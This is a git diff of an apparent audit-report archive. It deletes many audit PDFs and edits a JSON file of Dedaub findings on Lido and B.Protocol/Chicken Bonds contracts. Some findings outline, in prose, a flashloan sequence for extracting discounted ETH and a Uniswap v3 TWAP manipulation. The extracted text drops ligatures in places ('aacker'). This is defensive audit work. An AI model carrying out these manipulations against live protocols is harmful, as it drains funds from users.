b/pdfs/DFINITYCanisterSandbox.pdf deleted file mode 100644 index 3580685..0000000 Binary files a/pdfs/DFINITYCanisterSandbox.pdf and /dev/null differ diff --git a/pdfs/DFINITYCanisterSandboxFixReview.pdf b/pdfs/DFINITYCanisterSandboxFixReview.pdf deleted file mode 100644 index 4482e08..0000000 Binary files a/pdfs/DFINITYCanisterSandboxFixReview.pdf and /dev/null differ diff --git a/pdfs/DFINITYConsensus.pdf b/pdfs/DFINITYConsensus.pdf deleted file mode 100644 index 552bf43..0000000 Binary files a/pdfs/DFINITYConsensus.pdf and /dev/null differ diff --git a/pdfs/DFINITYThresholdECDSAandBtcCanisters.pdf b/pdfs/DFINITYThresholdECDSAandBtcCanisters.pdf deleted file mode 100644 index d23ae14..0000000 Binary files a/pdfs/DFINITYThresholdECDSAandBtcCanisters.pdf and /dev/null differ diff --git a/pdfs/DFINITYThresholdECDSAandBtcCanistersFixReview.pdf b/pdfs/DFINITYThresholdECDSAandBtcCanistersFixReview.pdf deleted file mode 100644 index a10d63b..0000000 Binary files a/pdfs/DFINITYThresholdECDSAandBtcCanistersFixReview.pdf and /dev/null differ diff --git a/pdfs/DeGate.pdf b/pdfs/DeGate.pdf deleted file mode 100644 index 3fa1cd0..0000000 Binary files a/pdfs/DeGate.pdf and /dev/null differ diff --git a/pdfs/EIP-1283.pdf b/pdfs/EIP-1283.pdf deleted file mode 100644 index 30687ed..0000000 Binary files a/pdfs/EIP-1283.pdf and /dev/null differ diff --git a/pdfs/ETH2DepositCLI.pdf b/pdfs/ETH2DepositCLI.pdf deleted file mode 100644 index 8eca604..0000000 Binary files a/pdfs/ETH2DepositCLI.pdf and /dev/null differ diff --git a/pdfs/Flexa.pdf b/pdfs/Flexa.pdf deleted file mode 100644 index f527608..0000000 Binary files a/pdfs/Flexa.pdf and /dev/null differ diff --git a/pdfs/FraxFinance.pdf b/pdfs/FraxFinance.pdf deleted file mode 100644 index 85be3b4..0000000 Binary files a/pdfs/FraxFinance.pdf and /dev/null differ diff --git a/pdfs/FraxQ22022.pdf b/pdfs/FraxQ22022.pdf deleted file mode 100644 index 072ab90..0000000 Binary files a/pdfs/FraxQ22022.pdf and /dev/null differ diff --git a/pdfs/FraxQ42021.pdf b/pdfs/FraxQ42021.pdf deleted file mode 100644 index 48d1fd8..0000000 Binary files a/pdfs/FraxQ42021.pdf and /dev/null differ diff --git a/pdfs/FujiProtocol.pdf b/pdfs/FujiProtocol.pdf deleted file mode 100644 index 83556ec..0000000 Binary files a/pdfs/FujiProtocol.pdf and /dev/null differ diff --git a/pdfs/Galoy.pdf b/pdfs/Galoy.pdf deleted file mode 100644 index e35e3bf..0000000 Binary files a/pdfs/Galoy.pdf and /dev/null differ diff --git a/pdfs/Helm.pdf b/pdfs/Helm.pdf deleted file mode 100644 index 3574a53..0000000 Binary files a/pdfs/Helm.pdf and /dev/null differ diff --git a/pdfs/Hey.pdf b/pdfs/Hey.pdf deleted file mode 100644 index 1187a68..0000000 Binary files a/pdfs/Hey.pdf and /dev/null differ diff --git a/pdfs/LedgerFilecoin.pdf b/pdfs/LedgerFilecoin.pdf deleted file mode 100644 index 95c0b9a..0000000 Binary files a/pdfs/LedgerFilecoin.pdf and /dev/null differ diff --git a/pdfs/Linkerd-fixreview.pdf b/pdfs/Linkerd-fixreview.pdf deleted file mode 100644 index ca30625..0000000 Binary files a/pdfs/Linkerd-fixreview.pdf and /dev/null differ diff --git a/pdfs/Linkerd-securityreview.pdf b/pdfs/Linkerd-securityreview.pdf deleted file mode 100644 index b243e15..0000000 Binary files a/pdfs/Linkerd-securityreview.pdf and /dev/null differ diff --git a/pdfs/Linkerd-threatmodel.pdf b/pdfs/Linkerd-threatmodel.pdf deleted file mode 100644 index 96fcd10..0000000 Binary files a/pdfs/Linkerd-threatmodel.pdf and /dev/null differ diff --git a/pdfs/LinuxKernelReleaseSigning.pdf b/pdfs/LinuxKernelReleaseSigning.pdf deleted file mode 100644 index 57080cd..0000000 Binary files a/pdfs/LinuxKernelReleaseSigning.pdf and /dev/null differ diff --git a/pdfs/Liquity.pdf b/pdfs/Liquity.pdf deleted file mode 100644 index 18dae9a..0000000 Binary files a/pdfs/Liquity.pdf and /dev/null differ diff --git a/pdfs/LiquityProtocolandStabilityPoolFinalReport.pdf b/pdfs/LiquityProtocolandStabilityPoolFinalReport.pdf deleted file mode 100644 index f698c15..0000000 Binary files a/pdfs/LiquityProtocolandStabilityPoolFinalReport.pdf and /dev/null differ diff --git a/pdfs/LiquityProxyContracts.pdf b/pdfs/LiquityProxyContracts.pdf deleted file mode 100644 index 62ea7f0..0000000 Binary files a/pdfs/LiquityProxyContracts.pdf and /dev/null differ diff --git a/pdfs/LooksRare.pdf b/pdfs/LooksRare.pdf deleted file mode 100644 index 037d172..0000000 Binary files a/pdfs/LooksRare.pdf and /dev/null differ diff --git a/pdfs/MagmaWallet.pdf b/pdfs/MagmaWallet.pdf deleted file mode 100644 index 532ecc7..0000000 Binary files a/pdfs/MagmaWallet.pdf and /dev/null differ diff --git a/pdfs/MapleFinance.pdf b/pdfs/MapleFinance.pdf deleted file mode 100644 index 219ba4d..0000000 Binary files a/pdfs/MapleFinance.pdf and /dev/null differ diff --git a/pdfs/MesonProtocol.pdf b/pdfs/MesonProtocol.pdf deleted file mode 100644 index 1468a77..0000000 Binary files a/pdfs/MesonProtocol.pdf and /dev/null differ diff --git a/pdfs/MesonProtocolDesignReview.pdf b/pdfs/MesonProtocolDesignReview.pdf deleted file mode 100644 index 13a9cae..0000000 Binary files a/pdfs/MesonProtocolDesignReview.pdf and /dev/null differ diff --git a/pdfs/MesonProtocolFixReview.pdf b/pdfs/MesonProtocolFixReview.pdf deleted file mode 100644 index a13bfaa..0000000 Binary files a/pdfs/MesonProtocolFixReview.pdf and /dev/null differ diff --git a/pdfs/Microsoft-go-cose.pdf b/pdfs/Microsoft-go-cose.pdf deleted file mode 100644 index ff01c2b..0000000 Binary files a/pdfs/Microsoft-go-cose.pdf and /dev/null differ diff --git a/pdfs/MobileCoinBFT.pdf b/pdfs/MobileCoinBFT.pdf deleted file mode 100644 index 6dffc16..0000000 Binary files a/pdfs/MobileCoinBFT.pdf and /dev/null differ diff --git a/pdfs/Mobilecoin.pdf b/pdfs/Mobilecoin.pdf deleted file mode 100644 index d77995b..0000000 Binary files a/pdfs/Mobilecoin.pdf and /dev/null differ diff --git a/pdfs/MobilecoinFog.pdf b/pdfs/MobilecoinFog.pdf deleted file mode 100644 index f2cc27a..0000000 Binary files a/pdfs/MobilecoinFog.pdf and /dev/null differ diff --git a/pdfs/MorphoLabs.pdf b/pdfs/MorphoLabs.pdf deleted file mode 100644 index 54f5eaf..0000000 Binary files a/pdfs/MorphoLabs.pdf and /dev/null differ diff --git a/pdfs/NFTX.pdf b/pdfs/NFTX.pdf deleted file mode 100644 index 5a50233..0000000 Binary files a/pdfs/NFTX.pdf and /dev/null differ diff --git a/pdfs/NervosSUDT.pdf b/pdfs/NervosSUDT.pdf deleted file mode 100644 index fc05a39..0000000 Binary files a/pdfs/NervosSUDT.pdf and /dev/null differ diff --git a/pdfs/OPAGatekeeper.pdf b/pdfs/OPAGatekeeper.pdf deleted file mode 100644 index 12c17f4..0000000 Binary files a/pdfs/OPAGatekeeper.pdf and /dev/null differ diff --git a/pdfs/Opyn-Gamma-Protocol.pdf b/pdfs/Opyn-Gamma-Protocol.pdf deleted file mode 100644 index 2df0a3e..0000000 Binary files a/pdfs/Opyn-Gamma-Protocol.pdf and /dev/null differ diff --git a/pdfs/Opyn.pdf b/pdfs/Opyn.pdf deleted file mode 100644 index 85729c6..0000000 Binary files a/pdfs/Opyn.pdf and /dev/null differ diff --git a/pdfs/OriginDollar.pdf b/pdfs/OriginDollar.pdf deleted file mode 100644 index f70768a..0000000 Binary files a/pdfs/OriginDollar.pdf and /dev/null differ diff --git a/pdfs/ParallelFinance.pdf b/pdfs/ParallelFinance.pdf deleted file mode 100644 index 0f2be95..0000000 Binary files a/pdfs/ParallelFinance.pdf and /dev/null differ diff --git a/pdfs/ParallelFinance2.pdf b/pdfs/ParallelFinance2.pdf deleted file mode 100644 index dbd14a7..0000000 Binary files a/pdfs/ParallelFinance2.pdf and /dev/null differ diff --git a/pdfs/ParallelFinance2FixReview.pdf b/pdfs/ParallelFinance2FixReview.pdf deleted file mode 100644 index 4874c44..0000000 Binary files a/pdfs/ParallelFinance2FixReview.pdf and /dev/null differ diff --git a/pdfs/ParallelFinance3.pdf b/pdfs/ParallelFinance3.pdf deleted file mode 100644 index f8f0ef9..0000000 Binary files a/pdfs/ParallelFinance3.pdf and /dev/null differ diff --git a/pdfs/PerpetualProtocolV2.pdf b/pdfs/PerpetualProtocolV2.pdf deleted file mode 100644 index 07c232d..0000000 Binary files a/pdfs/PerpetualProtocolV2.pdf and /dev/null differ diff --git a/pdfs/Primitive.pdf b/pdfs/Primitive.pdf deleted file mode 100644 index 256dca3..0000000 Binary files a/pdfs/Primitive.pdf and /dev/null differ diff --git a/pdfs/RSKj.pdf b/pdfs/RSKj.pdf deleted file mode 100644 index 91f0186..0000000 Binary files a/pdfs/RSKj.pdf and /dev/null differ diff --git a/pdfs/Reserve_LOA.pdf b/pdfs/Reserve_LOA.pdf deleted file mode 100644 index 301181b..0000000 Binary files a/pdfs/Reserve_LOA.pdf and /dev/null differ diff --git a/pdfs/RocketPool.pdf b/pdfs/RocketPool.pdf deleted file mode 100644 index d275d03..0000000 Binary files a/pdfs/RocketPool.pdf and /dev/null differ diff --git a/pdfs/SeaportProtocol.pdf b/pdfs/SeaportProtocol.pdf deleted file mode 100644 index 7d80009..0000000 Binary files a/pdfs/SeaportProtocol.pdf and /dev/null differ diff --git a/pdfs/SecureDropWorkstation.pdf b/pdfs/SecureDropWorkstation.pdf deleted file mode 100644 index ef9ab03..0000000 Binary files a/pdfs/SecureDropWorkstation.pdf and /dev/null differ diff --git a/pdfs/ShellProtocolv2.pdf b/pdfs/ShellProtocolv2.pdf deleted file mode 100644 index 2ca9fe6..0000000 Binary files a/pdfs/ShellProtocolv2.pdf and /dev/null differ diff --git a/pdfs/Sherlockv2.pdf b/pdfs/Sherlockv2.pdf deleted file mode 100644 index 74cdd79..0000000 Binary files a/pdfs/Sherlockv2.pdf and /dev/null differ diff --git a/pdfs/SimpleXChat.pdf b/pdfs/SimpleXChat.pdf deleted file mode 100644 index 4f6fa9c..0000000 Binary files a/pdfs/SimpleXChat.pdf and /dev/null differ diff --git a/pdfs/SpruceID.pdf b/pdfs/SpruceID.pdf deleted file mode 100644 index 02726d0..0000000 Binary files a/pdfs/SpruceID.pdf and /dev/null differ diff --git a/pdfs/StandardNotes.pdf b/pdfs/StandardNotes.pdf deleted file mode 100644 index 60b6172..0000000 Binary files a/pdfs/StandardNotes.pdf and /dev/null differ diff --git a/pdfs/SweetB.pdf b/pdfs/SweetB.pdf deleted file mode 100644 index 1b30d50..0000000 Binary files a/pdfs/SweetB.pdf and /dev/null differ diff --git a/pdfs/Symbol.pdf b/pdfs/Symbol.pdf deleted file mode 100644 index f3f20d4..0000000 Binary files a/pdfs/Symbol.pdf and /dev/null differ diff --git a/pdfs/Tekton.pdf b/pdfs/Tekton.pdf deleted file mode 100644 index 970f718..0000000 Binary files a/pdfs/Tekton.pdf and /dev/null differ diff --git a/pdfs/Tezori.pdf b/pdfs/Tezori.pdf deleted file mode 100644 index cf61fde..0000000 Binary files a/pdfs/Tezori.pdf and /dev/null differ diff --git a/pdfs/TokenCard.pdf b/pdfs/TokenCard.pdf deleted file mode 100644 index 5e4a880..0000000 Binary files a/pdfs/TokenCard.pdf and /dev/null differ diff --git a/pdfs/Umee.pdf b/pdfs/Umee.pdf deleted file mode 100644 index 640a08a..0000000 Binary files a/pdfs/Umee.pdf and /dev/null differ diff --git a/pdfs/UniswapMobileWallet-fixreview.pdf b/pdfs/UniswapMobileWallet-fixreview.pdf deleted file mode 100644 index 7563ac6..0000000 Binary files a/pdfs/UniswapMobileWallet-fixreview.pdf and /dev/null differ diff --git a/pdfs/UniswapMobileWallet-securityreview.pdf b/pdfs/UniswapMobileWallet-securityreview.pdf deleted file mode 100644 index 3e6c800..0000000 Binary files a/pdfs/UniswapMobileWallet-securityreview.pdf and /dev/null differ diff --git a/pdfs/UniswapV3Core.pdf b/pdfs/UniswapV3Core.pdf deleted file mode 100644 index 7ea6076..0000000 Binary files a/pdfs/UniswapV3Core.pdf and /dev/null differ diff --git a/pdfs/WorkLock-Summary.pdf b/pdfs/WorkLock-Summary.pdf deleted file mode 100644 index 534a933..0000000 Binary files a/pdfs/WorkLock-Summary.pdf and /dev/null differ diff --git a/pdfs/YearnV2Vaults.pdf b/pdfs/YearnV2Vaults.pdf deleted file mode 100644 index d91066b..0000000 Binary files a/pdfs/YearnV2Vaults.pdf and /dev/null differ diff --git a/pdfs/YieldProtocol.pdf b/pdfs/YieldProtocol.pdf deleted file mode 100644 index 847289b..0000000 Binary files a/pdfs/YieldProtocol.pdf and /dev/null differ diff --git a/pdfs/YieldV2.pdf b/pdfs/YieldV2.pdf deleted file mode 100644 index 36735b8..0000000 Binary files a/pdfs/YieldV2.pdf and /dev/null differ diff --git a/pdfs/Zcash.pdf b/pdfs/Zcash.pdf deleted file mode 100644 index 11821fd..0000000 Binary files a/pdfs/Zcash.pdf and /dev/null differ diff --git a/pdfs/Zcash2.pdf b/pdfs/Zcash2.pdf deleted file mode 100644 index 7440d32..0000000 Binary files a/pdfs/Zcash2.pdf and /dev/null differ diff --git a/pdfs/ZcashWP.pdf b/pdfs/ZcashWP.pdf deleted file mode 100644 index 9e7dd15..0000000 Binary files a/pdfs/ZcashWP.pdf and /dev/null differ diff --git a/pdfs/ZeroTierProtocol.pdf b/pdfs/ZeroTierProtocol.pdf deleted file mode 100644 index 9e380af..0000000 Binary files a/pdfs/ZeroTierProtocol.pdf and /dev/null differ diff --git a/pdfs/aaveprotocol.pdf b/pdfs/aaveprotocol.pdf deleted file mode 100644 index efb1222..0000000 Binary files a/pdfs/aaveprotocol.pdf and /dev/null differ diff --git a/pdfs/amp.pdf b/pdfs/amp.pdf deleted file mode 100644 index 744aa9f..0000000 Binary files a/pdfs/amp.pdf and /dev/null differ diff --git a/pdfs/ampleforth.pdf b/pdfs/ampleforth.pdf deleted file mode 100644 index 1c8e575..0000000 Binary files a/pdfs/ampleforth.pdf and /dev/null differ diff --git a/pdfs/argo-securityreview.pdf b/pdfs/argo-securityreview.pdf deleted file mode 100644 index 5b9bdc6..0000000 Binary files a/pdfs/argo-securityreview.pdf and /dev/null differ diff --git a/pdfs/argo-threatmodel.pdf b/pdfs/argo-threatmodel.pdf deleted file mode 100644 index 430668a..0000000 Binary files a/pdfs/argo-threatmodel.pdf and /dev/null differ diff --git a/pdfs/arweave-randomx.pdf b/pdfs/arweave-randomx.pdf deleted file mode 100644 index bc282e5..0000000 Binary files a/pdfs/arweave-randomx.pdf and /dev/null differ diff --git a/pdfs/aztec.pdf b/pdfs/aztec.pdf deleted file mode 100644 index 8a8fa89..0000000 Binary files a/pdfs/aztec.pdf and /dev/null differ diff --git a/pdfs/basis.pdf b/pdfs/basis.pdf deleted file mode 100644 index 91abeed..0000000 Binary files a/pdfs/basis.pdf and /dev/null differ diff --git a/pdfs/chai-loa.pdf b/pdfs/chai-loa.pdf deleted file mode 100644 index b463440..0000000 Binary files a/pdfs/chai-loa.pdf and /dev/null differ diff --git a/pdfs/compound-2.pdf b/pdfs/compound-2.pdf deleted file mode 100644 index dd4fbe9..0000000 Binary files a/pdfs/compound-2.pdf and /dev/null differ diff --git a/pdfs/compound-3.pdf b/pdfs/compound-3.pdf deleted file mode 100644 index 606fc52..0000000 Binary files a/pdfs/compound-3.pdf and /dev/null differ diff --git a/pdfs/compound-governance.pdf b/pdfs/compound-governance.pdf deleted file mode 100644 index 0f9c649..0000000 Binary files a/pdfs/compound-governance.pdf and /dev/null differ diff --git a/pdfs/computable.pdf b/pdfs/computable.pdf deleted file mode 100644 index c45f451..0000000 Binary files a/pdfs/computable.pdf and /dev/null differ diff --git a/pdfs/curve-summary.pdf b/pdfs/curve-summary.pdf deleted file mode 100644 index 61f7180..0000000 Binary files a/pdfs/curve-summary.pdf and /dev/null differ diff --git a/pdfs/dapphub.pdf b/pdfs/dapphub.pdf deleted file mode 100644 index 03b468d..0000000 Binary files a/pdfs/dapphub.pdf and /dev/null differ diff --git a/pdfs/dedaub-audits b/pdfs/dedaub-audits index 801ad04..010acc5 160000 --- a/pdfs/dedaub-audits +++ b/pdfs/dedaub-audits @@ -1 +1 @@ -Subproject commit 801ad041d3cd0dc0ee52027141017bc6b7ea32ed +Subproject commit 010acc566478bff446e8a17e6638671e6b275a00 diff --git a/pdfs/dexter.pdf b/pdfs/dexter.pdf deleted file mode 100644 index ea62105..0000000 Binary files a/pdfs/dexter.pdf and /dev/null differ diff --git a/pdfs/dharma-smartwallet.pdf b/pdfs/dharma-smartwallet.pdf deleted file mode 100644 index b482c3b..0000000 Binary files a/pdfs/dharma-smartwallet.pdf and /dev/null differ diff --git a/pdfs/dodo.pdf b/pdfs/dodo.pdf deleted file mode 100644 index 108ef19..0000000 Binary files a/pdfs/dodo.pdf and /dev/null differ diff --git a/pdfs/dtoken.pdf b/pdfs/dtoken.pdf deleted file mode 100644 index 4cfca6f..0000000 Binary files a/pdfs/dtoken.pdf and /dev/null differ diff --git a/pdfs/etcd.pdf b/pdfs/etcd.pdf deleted file mode 100644 index edd829c..0000000 Binary files a/pdfs/etcd.pdf and /dev/null differ diff --git a/pdfs/gemini-dollar.pdf b/pdfs/gemini-dollar.pdf deleted file mode 100644 index 0da9c6b..0000000 Binary files a/pdfs/gemini-dollar.pdf and /dev/null differ diff --git a/pdfs/golem.pdf b/pdfs/golem.pdf deleted file mode 100644 index a6e54b7..0000000 Binary files a/pdfs/golem.pdf and /dev/null differ diff --git a/pdfs/hegic-summary.pdf b/pdfs/hegic-summary.pdf deleted file mode 100644 index 1090ad8..0000000 Binary files a/pdfs/hegic-summary.pdf and /dev/null differ diff --git a/pdfs/hermez.pdf b/pdfs/hermez.pdf deleted file mode 100644 index d01767a..0000000 Binary files a/pdfs/hermez.pdf and /dev/null differ diff --git a/pdfs/livepeer.pdf b/pdfs/livepeer.pdf deleted file mode 100644 index 6904f91..0000000 Binary files a/pdfs/livepeer.pdf and /dev/null differ diff --git a/pdfs/mc-dai.pdf b/pdfs/mc-dai.pdf deleted file mode 100644 index d19c044..0000000 Binary files a/pdfs/mc-dai.pdf and /dev/null differ diff --git a/pdfs/nucypher-2.pdf b/pdfs/nucypher-2.pdf deleted file mode 100644 index 70ef11c..0000000 Binary files a/pdfs/nucypher-2.pdf and /dev/null differ diff --git a/pdfs/nucypher.pdf b/pdfs/nucypher.pdf deleted file mode 100644 index bdbe785..0000000 Binary files a/pdfs/nucypher.pdf and /dev/null differ diff --git a/pdfs/numerai.pdf b/pdfs/numerai.pdf deleted file mode 100644 index b8ec48e..0000000 Binary files a/pdfs/numerai.pdf and /dev/null differ diff --git a/pdfs/origin.pdf b/pdfs/origin.pdf deleted file mode 100644 index 33a6403..0000000 Binary files a/pdfs/origin.pdf and /dev/null differ diff --git a/pdfs/osquery.pdf b/pdfs/osquery.pdf deleted file mode 100644 index cf37d31..0000000 Binary files a/pdfs/osquery.pdf and /dev/null differ diff --git a/pdfs/pantheon.pdf b/pdfs/pantheon.pdf deleted file mode 100644 index fe9a5b4..0000000 Binary files a/pdfs/pantheon.pdf and /dev/null differ diff --git a/pdfs/parity.pdf b/pdfs/parity.pdf deleted file mode 100644 index c62befd..0000000 Binary files a/pdfs/parity.pdf and /dev/null differ diff --git a/pdfs/paxos.pdf b/pdfs/paxos.pdf deleted file mode 100644 index d85e908..0000000 Binary files a/pdfs/paxos.pdf and /dev/null differ diff --git a/pdfs/publications b/pdfs/publications new file mode 160000 index 0000000..3efd335 --- /dev/null +++ b/pdfs/publications @@ -0,0 +1 @@ +Subproject commit 3efd3357812e00ff510136756b522bdf7b66abe8 diff --git a/pdfs/qtum_loa.pdf b/pdfs/qtum_loa.pdf deleted file mode 100644 index 7ef7f5a..0000000 Binary files a/pdfs/qtum_loa.pdf and /dev/null differ diff --git a/pdfs/renvm.pdf b/pdfs/renvm.pdf deleted file mode 100644 index e44264d..0000000 Binary files a/pdfs/renvm.pdf and /dev/null differ diff --git a/pdfs/rook.pdf b/pdfs/rook.pdf deleted file mode 100644 index ae3d17e..0000000 Binary files a/pdfs/rook.pdf and /dev/null differ diff --git a/pdfs/sai.pdf b/pdfs/sai.pdf deleted file mode 100644 index 1e3348a..0000000 Binary files a/pdfs/sai.pdf and /dev/null differ diff --git a/pdfs/sandiskx600.pdf b/pdfs/sandiskx600.pdf deleted file mode 100644 index 58e50ad..0000000 Binary files a/pdfs/sandiskx600.pdf and /dev/null differ diff --git a/pdfs/setprotocol.pdf b/pdfs/setprotocol.pdf deleted file mode 100644 index a60c7ee..0000000 Binary files a/pdfs/setprotocol.pdf and /dev/null differ diff --git a/pdfs/spearbit-reports b/pdfs/spearbit-reports index 0063c52..e9098b7 160000 --- a/pdfs/spearbit-reports +++ b/pdfs/spearbit-reports @@ -1 +1 @@ -Subproject commit 0063c526418d22d3fadb9729bcb1747d5024dac7 +Subproject commit e9098b7517b0bf2a5946b8b1219b8758f9fdf3ec diff --git a/pdfs/thesis-summary.pdf b/pdfs/thesis-summary.pdf deleted file mode 100644 index 8409a05..0000000 Binary files a/pdfs/thesis-summary.pdf and /dev/null differ diff --git a/pdfs/voatz-securityreview.pdf b/pdfs/voatz-securityreview.pdf deleted file mode 100644 index 114358e..0000000 Binary files a/pdfs/voatz-securityreview.pdf and /dev/null differ diff --git a/pdfs/voatz-threatmodel.pdf b/pdfs/voatz-threatmodel.pdf deleted file mode 100644 index ba97662..0000000 Binary files a/pdfs/voatz-threatmodel.pdf and /dev/null differ diff --git a/pdfs/wALGO.pdf b/pdfs/wALGO.pdf deleted file mode 100644 index 6281f4e..0000000 Binary files a/pdfs/wALGO.pdf and /dev/null differ diff --git a/pdfs/wXTZ.pdf b/pdfs/wXTZ.pdf deleted file mode 100644 index 93709f5..0000000 Binary files a/pdfs/wXTZ.pdf and /dev/null differ diff --git a/pdfs/zcoin-lelantus-summary.pdf b/pdfs/zcoin-lelantus-summary.pdf deleted file mode 100644 index a038bb0..0000000 Binary files a/pdfs/zcoin-lelantus-summary.pdf and /dev/null differ diff --git a/pdfs/zecwallet.pdf b/pdfs/zecwallet.pdf deleted file mode 100644 index bf1d408..0000000 Binary files a/pdfs/zecwallet.pdf and /dev/null differ diff --git a/pdfs/zlib.pdf b/pdfs/zlib.pdf deleted file mode 100644 index f78f022..0000000 Binary files a/pdfs/zlib.pdf and /dev/null differ diff --git a/results/dedaub_findings.json b/results/dedaub_findings.json index 8c3955a..9924a68 100644 --- a/results/dedaub_findings.json +++ b/results/dedaub_findings.json @@ -50,1122 +50,922 @@ ] }, { - "title": "might misbehave if bufferedRedeems != fundRaisedBalanc ", - "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido on Kusama,Polkadot Liquid Staking Delta Audit - Apr 2023.pdf", - "body": " RESOLVED The intended procedure of forced unbond requires seing bufferedRedeems == fundRaisedBalance via a call to setBufferedRedeems. As a consequence, LidoUnbond::_processEnabled expects these two amounts to be equal during forced unbond. function _processEnabled(int256 _stake) internal { ... // Dedaub: This code will break if bufferedRedeems is not exactly // if (isUnbondForced && isRedeemDisabled && bufferedRedeems == fundRaisedBalance) equal to fundRaisedBalance { targetStake = 0; } else { targetStake = getTotalPooledKSM() / ledgersLength; } } However , the contract does not guarantee that these amounts will be exactly equal. For instance, setBufferedRedeems only contains an inequality check: function setBufferedRedeems( uint256 _bufferedRedeems ) external redeemDisabled auth(ROLE_BEACON_MANAGER) { // Dedaub: Equality not guaranteed require(_bufferedRedeems <= fundRaisedBalance, \"LIDO: VALUE_TOO_BIG\"); bufferedRedeems = _bufferedRedeems; } It is also hard to verify that no other function modifying these amounts can be called after calling setBufferedRedeems. If, for any reason, the amounts are not exactly equal during forced unbond, the else branch in _processEnabled will be executed, causing targetState to be wrongly computed and likely leaving the contract in a problematic state. To make the contract more robust we recommend properly handling the case when the two amounts are dierent, possibly by reverting, instead of executing the wrong branch. For instance: function _processEnabled(int256 _stake) internal { ... // Dedaub: Modified code if (isUnbondForced && isRedeemDisabled) { require(bufferedRedeems == fundRaisedBalance); targetStake = 0; } else { targetStake = getTotalPooledKSM() / ledgersLength; } } Another to fundRaisedBalance within this function. approach could be actually set _bufferedRedeems = L2 Set bufferedRedeems = fundRaisedBalance and isUnbondForced in a single transaction RESOLVED Forced unbond is initiated by seing bufferedRedeems = fundRaisedBalance and isUnbondForced = true, via separate calls to setIsUnbondForced and setBufferedRedeems. If, however, only one of the two changes is performed, the 4 contract will likely misbehave. As a consequence, it would be safer to perform both updates in a single transaction OTHER/ ADVISORY ISSUES: This section details issues that are not thought to directly aect the functionality of the project, but we recommend addressing them. ", + "title": "integration of ChickenBonds with BAMM allows limited nancial manipulation (aacker can get maximum discount ", + "html_url": "https://github.com/dedaub/audits/tree/main/Liquity/B.Protocol - Chicken Bonds Audit.pdf", + "body": " RESOLVED (commit a55871ec takes the Curve LUSD, in virtual terms, also into account) BAMMSP holds not only LUSD, but also ETH from liquidations. Anyone can buy ETH at a discount, which depends on the relative amounts of LUSD and ETH of the BAMMSP. In essence, the larger the amount of ETH compared to LUSD, the larger the discount. An aacker could act as follows: call shiftLUSDFromSPToCurve of the Chicken Bond protocol, decrease the amount of LUSD in BAMMSP and then buy ETH at a greater discount. There are no restrictions on who can call the shiftLUSDFromSPToCurve function, but the shift of the LUSD amounts takes place only if the LUSD price in Curve is too high. If this condition is satised, the aacker can perform the aack in order to buy ETH at a maximum discount at no extra cost. If not, then the aacker should rst manipulate the price at Curve using a flashloan. The steps are the following: 1.Increase the price of LUSD in Curve pool - above the threshold which allows shift from the SP to Curve - possibly using a flashloan. 0 2. Call shiftLUSDFromSPToCurve and move as many LUSD as possible to increase the discount on ETH 3. Buy ETH from BAMMSP at a discount. 4. Repay the flashloan. This aack is protable in a specic price range for LUSD, close to the too high threshold (otherwise the cost of tilting the pool will likely outweigh any benet from the discount), and the discount is bounded (at 4%, based on the design documents we were supplied). Hence, we consider this only a medium-severity issue. A general consideration of the protability of the aack should consider: a) that the second step drops the price of LUSD in Curve, resulting in losses for the aacker when he repays the flashloan at the 4th step. the amount of ETH the aacker can buy from BAMMSP at discount is b) However, independent from the amounts in the Curve pool, therefore under some circumstances the discount may also compensate for the losses making the aack protable.", "labels": [ "Dedaub", - "Lido on Kusama,Polkadot Liquid Staking Delta", - "Severity: Low" + "B.Protocol - Chicken Bonds", + "Severity: Medium" ] }, { - "title": "and check all contracts before starting the forced unbond procedure ", - "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido on Kusama,Polkadot Liquid Staking Delta Audit - Apr 2023.pdf", - "body": " INFO The documented procedure for enabling forced unbond states to rst update the Ledger contract, then to chill all Ledgers, and afterwards to upgrade the Lido contract. Although this order can work, we nd it safer to rst nish all upgrades of all contracts, check that the upgraded contracts work by simulating calls to the corresponding methods, and only then perform any state updating calls.", + "title": "v3 TWAPs can be manipulated, and this will become much easier post-Merge DISMISSED A Uniswap v3 TWAP is expected to be used to price LQTY relative to ETH. Uniswap v3 TWAPs can be manipulated, especially for less-used pools. (There have been at least three instances of aacks already, for pools with liquidity in the low millions. The LQTY-ETH pool currently has $780K of liquidity.) Although currently manipulation for active pools is considered rarely protable, once Ethereum switches to proof-of-stake (colloquially, after the Merge) such manipulation will be much easier to perform with guaranteed prot. Specically, to manipulate a data point used for a Uniswap v3 TWAP, an aacker needs to control two consecutive pool transactions (i.e., transactions over the manipulated pool) that are in separate blocks. (This typically means the last pool transaction of a block and the rst of the next block.) Under Ethereum proof-of-stake, validators are known in advance (at the beginning of the epoch) hence an aacker 0 can know when they are guaranteed to control the validator of the next block. The aack is: The aacker places the rst transaction as the last pool transaction of the previous block (either by being the validator of both blocks or using flashbots). The rst transaction tilts the pool. The aacker is guaranteed to not suer any losses from swaps over the the tilted pool because the aacker controls the unrealistic price of immediately next block, prepending to it a transaction that restores the pool, while aecting a TWAP data point in this way. The issue is at most medium-severity, because it only concerns selling LQTY, not the principal assets of the contracts. M3 Values from Chainlink are not checked DISMISSED in The protocol does not check whether the LUSD-USD price is successfully returned from in Chainlink GemSeller::compensateForLusdDeviation. Since this price is used to adjust the amount of ETH or LQTY returned by a swap in BAMM and GemSeller respectively, it is important to ensure that the values from Chainlink are accurate and correct. BAMM::compensateForLusdDeviation and is This in contrast with how Chainlink ETH-USD prices are retrieved in BAMM::fetchPrice and GemSeller::fetchPrice, where each call to Chainlink is checked and any failures are reported using a return value of 0. LOW SEVERITY: [No low severity issues] CENTRALIZATION ISSUES: It is often desirable for DeFi protocols to assume no trust in a central authority, including the protocols owner. Even if the owner is reputable, users are more likely to engage with 0 a protocol that guarantees no catastrophic failure even in the case the owner gets hacked/compromised. We list issues of this kind below. (These issues should be considered in the context of usage/deployment, as they are not uncommon. Several high-prole, high-value protocols have centralization threats.) ID Description N1 Owner can set parameters with nancial impact ", + "html_url": "https://github.com/dedaub/audits/tree/main/Liquity/B.Protocol - Chicken Bonds Audit.pdf", + "body": " DISMISSED The owner of both the BAMM contract and the GemSeller contract can set several parameters with nancial impact. None is a major threat: the principal deposited by the Chicken Bonds protocol is safe, even if the owner of BAMM is malicious. However, some funds are at threat. Specically: (BAMM) Owners can set the chicken address. The chicken address holds considerable control over the protocol, as it is the only address permied to withdraw or deposit funds in the system. However, since this address can only ever be set once, the risk posed is limited. Once this address is set to the ChickenBondManager contract from the LUSD Chicken Bonds Protocol, this will no longer be an issue, as 